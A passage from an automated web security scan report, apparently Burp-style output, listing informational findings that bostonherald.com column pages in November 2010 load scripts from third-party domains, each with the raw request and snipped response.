<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.79. http://bostonherald.com/news/columnists/view/20101105friend_advises_chuck_turner_keep_your_mouth_shut/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101105friend_advises_chuck_turner_keep_your_mouth_shut/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20101105friend_advises_chuck_turner_keep_your_mouth_shut/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:26:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.80. http://bostonherald.com/news/columnists/view/20101105kujo_its_about_time_your_luck_ran_out/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101105kujo_its_about_time_your_luck_ran_out/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20101105kujo_its_about_time_your_luck_ran_out/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:26:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.81. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:24:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.82. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.83. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.84. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:25:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 76815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.85. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107puerto_rican_vets_seek_honor/srvc=news&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20101107puerto_rican_vets_seek_honor/srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:25:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.86. http://bostonherald.com/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
